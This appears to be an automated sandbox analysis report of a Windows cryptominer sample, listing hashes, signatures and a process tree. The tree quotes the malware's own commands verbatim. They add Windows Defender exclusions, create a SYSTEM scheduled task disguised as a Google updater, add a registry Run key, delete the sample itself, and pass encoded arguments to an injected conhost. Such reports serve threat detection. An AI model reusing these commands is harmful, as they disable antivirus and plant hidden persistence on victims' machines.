Overview
overview
10Static
static
3grhsghsGHs...y8.exe
windows7-x64
10grhsghsGHs...y8.exe
windows10-2004-x64
10grhsghsGHs...SE.exe
windows7-x64
10grhsghsGHs...SE.exe
windows10-2004-x64
10grhsghsGHs...CD.exe
windows7-x64
10grhsghsGHs...CD.exe
windows10-2004-x64
10grhsghsGHs...Da.exe
windows7-x64
10grhsghsGHs...Da.exe
windows10-2004-x64
10grhsghsGHs...wq.exe
windows7-x64
10grhsghsGHs...wq.exe
windows10-2004-x64
10grhsghsGHs...r7.exe
windows7-x64
10grhsghsGHs...r7.exe
windows10-2004-x64
10grhsghsGHs...XJ.exe
windows7-x64
10grhsghsGHs...XJ.exe
windows10-2004-x64
10grhsghsGHs...eg.exe
windows7-x64
10grhsghsGHs...eg.exe
windows10-2004-x64
10grhsghsGHs...5H.exe
windows7-x64
10grhsghsGHs...5H.exe
windows10-2004-x64
10grhsghsGHs...XN.exe
windows7-x64
10grhsghsGHs...XN.exe
windows10-2004-x64
10grhsghsGHs...T3.exe
windows7-x64
10grhsghsGHs...T3.exe
windows10-2004-x64
10grhsghsGHs...9r.exe
windows7-x64
10grhsghsGHs...9r.exe
windows10-2004-x64
10grhsghsGHs...GR.exe
windows7-x64
10grhsghsGHs...GR.exe
windows10-2004-x64
10grhsghsGHs...EX.exe
windows7-x64
10grhsghsGHs...EX.exe
windows10-2004-x64
10grhsghsGHs...EA.exe
windows7-x64
10grhsghsGHs...EA.exe
windows10-2004-x64
10grhsghsGHs...FB.exe
windows7-x64
10grhsghsGHs...FB.exe
windows10-2004-x64
10Resubmissions
25-01-2024 16:55
240125-vfcyksbhgr 1024-01-2024 17:15
240124-vstf4aecaj 1023-01-2024 19:27
240123-x6cfvagbd9 1023-01-2024 19:27
240123-x6bvbafgem 1023-01-2024 19:27
240123-x6bjjsgbd8 1023-01-2024 19:27
240123-x6ax1sfgek 1023-01-2024 19:27
240123-x6abgsfgej 1023-01-2024 19:27
240123-x591qagbd7 1023-01-2024 19:27
240123-x59d7agbd6 1023-01-2024 19:27
240123-x584esgbd5 10Analysis
-
max time kernel
376s -
max time network
1800s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
24-01-2024 17:15
Static task
static1
Behavioral task
behavioral1
Sample
grhsghsGHswgh/3JynzWc6LxNCT2y8.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
grhsghsGHswgh/3JynzWc6LxNCT2y8.exe
Resource
win10v2004-20231222-en
Behavioral task
behavioral3
Sample
grhsghsGHswgh/6aNn9vLJCQVfagSE.exe
Resource
win7-20231215-en
Behavioral task
behavioral4
Sample
grhsghsGHswgh/6aNn9vLJCQVfagSE.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral5
Sample
grhsghsGHswgh/6vHkJ4UErTSS5ECD.exe
Resource
win7-20231129-en
Behavioral task
behavioral6
Sample
grhsghsGHswgh/6vHkJ4UErTSS5ECD.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral7
Sample
grhsghsGHswgh/Be5sCbvuma2nkHDa.exe
Resource
win7-20231215-en
Behavioral task
behavioral8
Sample
grhsghsGHswgh/Be5sCbvuma2nkHDa.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral9
Sample
grhsghsGHswgh/DLKFnAGYJBNTnxwq.exe
Resource
win7-20231215-en
Behavioral task
behavioral10
Sample
grhsghsGHswgh/DLKFnAGYJBNTnxwq.exe
Resource
win10v2004-20231222-en
Behavioral task
behavioral11
Sample
grhsghsGHswgh/EtPLMpbCyFJpMJr7.exe
Resource
win7-20231215-en
Behavioral task
behavioral12
Sample
grhsghsGHswgh/EtPLMpbCyFJpMJr7.exe
Resource
win10v2004-20231222-en
Behavioral task
behavioral13
Sample
grhsghsGHswgh/Gu3PdXt79NF7EJXJ.exe
Resource
win7-20231129-en
Behavioral task
behavioral14
Sample
grhsghsGHswgh/Gu3PdXt79NF7EJXJ.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral15
Sample
grhsghsGHswgh/JqLvG94UkYjhxAeg.exe
Resource
win7-20231215-en
Behavioral task
behavioral16
Sample
grhsghsGHswgh/JqLvG94UkYjhxAeg.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral17
Sample
grhsghsGHswgh/LM3BR4UBmKBzBP5H.exe
Resource
win7-20231215-en
Behavioral task
behavioral18
Sample
grhsghsGHswgh/LM3BR4UBmKBzBP5H.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral19
Sample
grhsghsGHswgh/M8xUNW42QxTLMRXN.exe
Resource
win7-20231215-en
Behavioral task
behavioral20
Sample
grhsghsGHswgh/M8xUNW42QxTLMRXN.exe
Resource
win10v2004-20231222-en
Behavioral task
behavioral21
Sample
grhsghsGHswgh/Q5EUCWHU7pMYBfT3.exe
Resource
win7-20231215-en
Behavioral task
behavioral22
Sample
grhsghsGHswgh/Q5EUCWHU7pMYBfT3.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral23
Sample
grhsghsGHswgh/UMRsPGc4u9tycx9r.exe
Resource
win7-20231215-en
Behavioral task
behavioral24
Sample
grhsghsGHswgh/UMRsPGc4u9tycx9r.exe
Resource
win10v2004-20231222-en
Behavioral task
behavioral25
Sample
grhsghsGHswgh/UU4Ddwqm5zcuLzGR.exe
Resource
win7-20231215-en
Behavioral task
behavioral26
Sample
grhsghsGHswgh/UU4Ddwqm5zcuLzGR.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral27
Sample
grhsghsGHswgh/XJEzW6M7WvHaF3EX.exe
Resource
win7-20231129-en
Behavioral task
behavioral28
Sample
grhsghsGHswgh/XJEzW6M7WvHaF3EX.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral29
Sample
grhsghsGHswgh/Y2JYGshMHJGuGREA.exe
Resource
win7-20231129-en
Behavioral task
behavioral30
Sample
grhsghsGHswgh/Y2JYGshMHJGuGREA.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral31
Sample
grhsghsGHswgh/Yvdp8t5knpQz7sFB.exe
Resource
win7-20231215-en
General
-
Target
grhsghsGHswgh/UMRsPGc4u9tycx9r.exe
-
Size
2.0MB
-
MD5
a16a669a09bf158058b83e04e69fe38e
-
SHA1
f6c94763850d9e590d86057139e8895a7aacdeea
-
SHA256
cacc0261ccf7578ef5c1f9fdbe35705ad91070d020a4225e05cbf71a6103ac8e
-
SHA512
658b52ad1d27becee5b5bbd443d43da38b88d49880e72c8cb843f176a2d84d571b39c34dbc7cfb7ea56acc548acc5b68cce47a8bcf9d173feec031f7e33a09c6
-
SSDEEP
49152:rWVipAxqo5p88CbXuxWQiSJU320ZW21Q0YWAij64ane6szjmL/45:rxAEcp9ueXit9WAQ0YWuO
Malware Config
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 10 IoCs
Processes:
UMRsPGc4u9tycx9r.exeupdater.execonhost.exedescription pid process target process PID 2804 created 1248 2804 UMRsPGc4u9tycx9r.exe Explorer.EXE PID 2804 created 1248 2804 UMRsPGc4u9tycx9r.exe Explorer.EXE PID 2804 created 1248 2804 UMRsPGc4u9tycx9r.exe Explorer.EXE PID 2804 created 1248 2804 UMRsPGc4u9tycx9r.exe Explorer.EXE PID 568 created 1248 568 updater.exe Explorer.EXE PID 568 created 1248 568 updater.exe Explorer.EXE PID 568 created 1248 568 updater.exe Explorer.EXE PID 568 created 1248 568 updater.exe Explorer.EXE PID 2276 created 1248 2276 conhost.exe Explorer.EXE PID 568 created 1248 568 updater.exe Explorer.EXE -
XMRig Miner payload 30 IoCs
Processes:
resource yara_rule behavioral23/memory/3048-71-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral23/memory/3048-73-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral23/memory/3048-74-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral23/memory/3048-76-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral23/memory/3048-80-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral23/memory/3048-82-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral23/memory/3048-84-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral23/memory/3048-86-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral23/memory/3048-88-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral23/memory/3048-90-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral23/memory/3048-92-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral23/memory/3048-94-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral23/memory/3048-96-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral23/memory/3048-98-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral23/memory/3048-100-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral23/memory/3048-102-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral23/memory/3048-104-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral23/memory/3048-106-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral23/memory/3048-108-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral23/memory/3048-110-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral23/memory/3048-112-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral23/memory/3048-114-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral23/memory/3048-116-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral23/memory/3048-118-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral23/memory/3048-120-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral23/memory/3048-122-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral23/memory/3048-124-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral23/memory/3048-126-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral23/memory/3048-128-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral23/memory/3048-130-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig -
Deletes itself 1 IoCs
Processes:
cmd.exepid process 2604 cmd.exe -
Executes dropped EXE 1 IoCs
Processes:
updater.exepid process 568 updater.exe -
Loads dropped DLL 1 IoCs
Processes:
taskeng.exepid process 1144 taskeng.exe -
Processes:
resource yara_rule behavioral23/memory/3048-66-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral23/memory/3048-71-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral23/memory/3048-73-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral23/memory/3048-74-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral23/memory/3048-76-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral23/memory/3048-80-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral23/memory/3048-82-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral23/memory/3048-84-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral23/memory/3048-86-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral23/memory/3048-88-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral23/memory/3048-90-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral23/memory/3048-92-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral23/memory/3048-94-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral23/memory/3048-96-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral23/memory/3048-98-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral23/memory/3048-100-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral23/memory/3048-102-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral23/memory/3048-104-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral23/memory/3048-106-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral23/memory/3048-108-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral23/memory/3048-110-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral23/memory/3048-112-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral23/memory/3048-114-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral23/memory/3048-116-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral23/memory/3048-118-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral23/memory/3048-120-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral23/memory/3048-122-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral23/memory/3048-124-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral23/memory/3048-126-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral23/memory/3048-128-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral23/memory/3048-130-0x0000000140000000-0x00000001407F4000-memory.dmp upx -
Drops file in System32 directory 5 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exedescription ioc process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
updater.exedescription pid process target process PID 568 set thread context of 2276 568 updater.exe conhost.exe PID 568 set thread context of 3048 568 updater.exe conhost.exe -
Drops file in Program Files directory 4 IoCs
Processes:
UMRsPGc4u9tycx9r.exeupdater.execmd.execmd.exedescription ioc process File created C:\Program Files\Google\Chrome\updater.exe UMRsPGc4u9tycx9r.exe File created C:\Program Files\Google\Libs\WR64.sys updater.exe File created C:\Program Files\Google\Libs\g.log cmd.exe File created C:\Program Files\Google\Libs\g.log cmd.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exepid process 2128 schtasks.exe 2528 schtasks.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
-
Modifies data under HKEY_USERS 3 IoCs
Processes:
powershell.exeWMIC.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 701eb7eeb84fda01 powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe -
Suspicious behavior: EnumeratesProcesses 25 IoCs
Processes:
UMRsPGc4u9tycx9r.exepowershell.exepowershell.exepowershell.exeupdater.exepowershell.exepowershell.execonhost.exepid process 2804 UMRsPGc4u9tycx9r.exe 2804 UMRsPGc4u9tycx9r.exe 3008 powershell.exe 2804 UMRsPGc4u9tycx9r.exe 2804 UMRsPGc4u9tycx9r.exe 2340 powershell.exe 2804 UMRsPGc4u9tycx9r.exe 2804 UMRsPGc4u9tycx9r.exe 2804 UMRsPGc4u9tycx9r.exe 2804 UMRsPGc4u9tycx9r.exe 2600 powershell.exe 568 updater.exe 568 updater.exe 320 powershell.exe 568 updater.exe 568 updater.exe 2476 powershell.exe 568 updater.exe 568 updater.exe 568 updater.exe 568 updater.exe 2276 conhost.exe 2276 conhost.exe 568 updater.exe 568 updater.exe -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid process 464 -
Suspicious use of AdjustPrivilegeToken 31 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exeupdater.exeWMIC.execonhost.exedescription pid process Token: SeDebugPrivilege 3008 powershell.exe Token: SeDebugPrivilege 2340 powershell.exe Token: SeDebugPrivilege 2600 powershell.exe Token: SeDebugPrivilege 320 powershell.exe Token: SeDebugPrivilege 2476 powershell.exe Token: SeDebugPrivilege 568 updater.exe Token: SeAssignPrimaryTokenPrivilege 1652 WMIC.exe Token: SeIncreaseQuotaPrivilege 1652 WMIC.exe Token: SeSecurityPrivilege 1652 WMIC.exe Token: SeTakeOwnershipPrivilege 1652 WMIC.exe Token: SeLoadDriverPrivilege 1652 WMIC.exe Token: SeSystemtimePrivilege 1652 WMIC.exe Token: SeBackupPrivilege 1652 WMIC.exe Token: SeRestorePrivilege 1652 WMIC.exe Token: SeShutdownPrivilege 1652 WMIC.exe Token: SeSystemEnvironmentPrivilege 1652 WMIC.exe Token: SeUndockPrivilege 1652 WMIC.exe Token: SeManageVolumePrivilege 1652 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 1652 WMIC.exe Token: SeIncreaseQuotaPrivilege 1652 WMIC.exe Token: SeSecurityPrivilege 1652 WMIC.exe Token: SeTakeOwnershipPrivilege 1652 WMIC.exe Token: SeLoadDriverPrivilege 1652 WMIC.exe Token: SeSystemtimePrivilege 1652 WMIC.exe Token: SeBackupPrivilege 1652 WMIC.exe Token: SeRestorePrivilege 1652 WMIC.exe Token: SeShutdownPrivilege 1652 WMIC.exe Token: SeSystemEnvironmentPrivilege 1652 WMIC.exe Token: SeUndockPrivilege 1652 WMIC.exe Token: SeManageVolumePrivilege 1652 WMIC.exe Token: SeLockMemoryPrivilege 3048 conhost.exe -
Suspicious use of WriteProcessMemory 20 IoCs
Processes:
powershell.execmd.exepowershell.exetaskeng.exepowershell.exeupdater.execmd.exedescription pid process target process PID 2340 wrote to memory of 2528 2340 powershell.exe schtasks.exe PID 2340 wrote to memory of 2528 2340 powershell.exe schtasks.exe PID 2340 wrote to memory of 2528 2340 powershell.exe schtasks.exe PID 2604 wrote to memory of 2700 2604 cmd.exe choice.exe PID 2604 wrote to memory of 2700 2604 cmd.exe choice.exe PID 2604 wrote to memory of 2700 2604 cmd.exe choice.exe PID 2600 wrote to memory of 780 2600 powershell.exe schtasks.exe PID 2600 wrote to memory of 780 2600 powershell.exe schtasks.exe PID 2600 wrote to memory of 780 2600 powershell.exe schtasks.exe PID 1144 wrote to memory of 568 1144 taskeng.exe updater.exe PID 1144 wrote to memory of 568 1144 taskeng.exe updater.exe PID 1144 wrote to memory of 568 1144 taskeng.exe updater.exe PID 2476 wrote to memory of 2128 2476 powershell.exe schtasks.exe PID 2476 wrote to memory of 2128 2476 powershell.exe schtasks.exe PID 2476 wrote to memory of 2128 2476 powershell.exe schtasks.exe PID 568 wrote to memory of 2276 568 updater.exe conhost.exe PID 1656 wrote to memory of 1652 1656 cmd.exe WMIC.exe PID 1656 wrote to memory of 1652 1656 cmd.exe WMIC.exe PID 1656 wrote to memory of 1652 1656 cmd.exe WMIC.exe PID 568 wrote to memory of 3048 568 updater.exe conhost.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:1248
-
C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\UMRsPGc4u9tycx9r.exe"C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\UMRsPGc4u9tycx9r.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:2804 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3008 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2340 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"3⤵
- Creates scheduled task(s)
PID:2528 -
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\UMRsPGc4u9tycx9r.exe"2⤵
- Deletes itself
- Suspicious use of WriteProcessMemory
PID:2604 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#glbtb#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2600 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC3⤵PID:780
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:320 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2476 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"3⤵
- Creates scheduled task(s)
PID:2128 -
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"2⤵
- Drops file in Program Files directory
PID:1648 -
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"2⤵
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:1656 -
C:\Windows\System32\Wbem\WMIC.exewmic PATH Win32_VideoController GET Name, VideoProcessor3⤵
- Detects videocard installed
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1652 -
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe qtdiqnkejoz2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious behavior: EnumeratesProcesses
PID:2276 -
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe coygkprqxpklmnvz 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPooFst8AJlNjZc1TvSyIQTKz3bkbADxizSwgp6IHJKg4enmph7iNmIeAYcJJRGkawcinVbrMdr45fHmW9ZqCrw3dSLKVMKzrI2u4sgGlTj0G1RmIYUpqYq+tIjGyNap0si+Bl1xh/1o3aGmtmdST7PlUgkYz6ci8qWCk/Icfx3DrSi2oQaBV3Dr68Ysn/4ifK09AI9K4Wz/J2kKABX44SMSz/klz2Q+FtxUOLuLpB0ApMJVvTxUIOnUHLATPgLq86uJLXtnMRoz90CklrR3X6ggj+Qodet1aWyPnFIog0clkH9Lt1wIn/XNs6NZ/3bJg2NyJ2xuvDRy+oOBgUebKWiz2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3048
-
C:\Windows\System32\choice.exechoice /C Y /N /D Y /T 31⤵PID:2700
-
C:\Windows\system32\taskeng.exetaskeng.exe {8B6D945D-C4E0-41D3-AF6F-B5C5247079C9} S-1-5-18:NT AUTHORITY\System:Service:1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1144 -
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:568
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
81KB
MD524ee757a48003de44473789dceec899a
SHA156552f875be04cb9cf2a38c587c263c9116d78da
SHA25683d3d918b2aa9d021980baf551590d5a0f922adec5b9ebb895cac52eab7b8dfc
SHA51219def46c201741881fc46d1bd1effa651be63e9df53e5769383d895374dea6c9ece153827ae3d6733ce6b67288c3b347090af0ad85fbf0fd5224b1fec1fdd2cd
-
Filesize
2.0MB
MD5a16a669a09bf158058b83e04e69fe38e
SHA1f6c94763850d9e590d86057139e8895a7aacdeea
SHA256cacc0261ccf7578ef5c1f9fdbe35705ad91070d020a4225e05cbf71a6103ac8e
SHA512658b52ad1d27becee5b5bbd443d43da38b88d49880e72c8cb843f176a2d84d571b39c34dbc7cfb7ea56acc548acc5b68cce47a8bcf9d173feec031f7e33a09c6
-
Filesize
198B
MD537dd19b2be4fa7635ad6a2f3238c4af1
SHA1e5b2c034636b434faee84e82e3bce3a3d3561943
SHA2568066872eea036f3ff59d58ff82ea1d5a8248ebc3c2b6161a17fe5c48441edc07
SHA51286e8550412f282e18ef0c6417ee94e9c141433913452efffb738d92f040e20ecc5e2250e9e2ac1f94c248eab83a601cba5b006e982a4aefe9dcb88e9c53c67e5
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5db41c57533dcec19b3656ec7153df00f
SHA1464078b67669dc1cad7badd37fb05e3c150dfa0f
SHA2561b8bea624a5383a9def4a6dff9ba70dc831f624110682d2842cb7b5599240716
SHA512c0cffc1f601c4cc0c4bcb96a65b732f33c8ae67883b56b82b13c9ce2679a7036bf3c7186c01f36b2b8421c9519fcda34fd2f9673a444db62340e6aa6bdb7947e
-
Filesize
242KB
MD55e39540720cfcec3da1ce5fd3ca63648
SHA13016c2e6d851402e68aee4297e54673ca7501828
SHA2560b43c386de44d957890a5b1ff21e28ff868a6ff25aaccd85abd4cf91e13483c2
SHA512a7154fbd9a2c5a248928129febb311b93051a9e4b418e43174044cb0c84dbfd0ca70f8677d3965024a7317e5c4d1d52653d0dea2752f992b610f75d64dd1c724